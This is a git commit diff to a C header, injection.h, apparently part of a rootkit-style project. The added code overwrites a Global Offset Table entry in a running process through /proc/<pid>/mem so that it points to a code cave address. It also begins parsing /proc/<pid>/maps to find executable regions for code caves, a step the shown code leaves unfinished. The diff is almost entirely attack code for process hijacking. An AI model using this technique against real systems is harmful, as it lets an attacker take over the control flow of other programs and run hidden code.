Finished GOT section identification and writing, added parsing of /proc/<pid>/maps

2025-12-25 02:43:07 +08:00 · 2022-04-07 07:10:00 -04:00
parent e6ddb3373e
commit f4b88668b8
1 changed files with 30 additions and 5 deletions
--- a/src/user/include/utils/mem/injection.h
+++ b/src/user/include/utils/mem/injection.h
@@ -10,9 +10,11 @@
 #include "../common/constants.h"
 #include "../common/map_common.h"

+#include "code_caver.h"
+
 int manage_injection(const struct rb_event* event){
    char mem_file_name[100];
-    char *buf="AAAAAAAAAAAAA";
+    __u64 buf = (__u64)CODE_CAVE_ADDRESS;
    int mem_fd;


@@ -24,12 +26,35 @@ int manage_injection(const struct rb_event* event){
    mem_fd = open(mem_file_name, O_RDWR);
    lseek(mem_fd, event->got_address, SEEK_SET);

-    for(int ii=0; ii<8; ii++){
-        if(write(mem_fd, buf, 1) < 0 ){
-            perror("Writing");
+    for(int ii=0; ii<sizeof(__u64); ii++){
+        if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
+            perror("Error while writing at GOT");
+            return -1;
        }
    }
-    
+
+    //Parsing /proc/pid/maps.
+    //Note that addresses usually appear as 32-bit when catting, but this is not completely true
+    //
+    char *maps_file = calloc(512, sizeof(char));
+    FILE *f;
+    sprintf(maps_file, "/proc/%d/maps", event->pid);
+    f = fopen(maps_file, "rt");
+    while (fgets(maps_file, 512, f)) {
+        __u32 pgoff, major, minor;
+        __u64 from, to, ino;
+        char flags[4];
+        int ret = sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
+        printf("MAPS: %s\n", maps_file);
+
+        //Parse flags, find executable one
+        if(flags[2] == 'x'){
+            //Candidate for code cave finding
+            
+        }
+    }
+
+    free(maps_file);

    return 0;
 }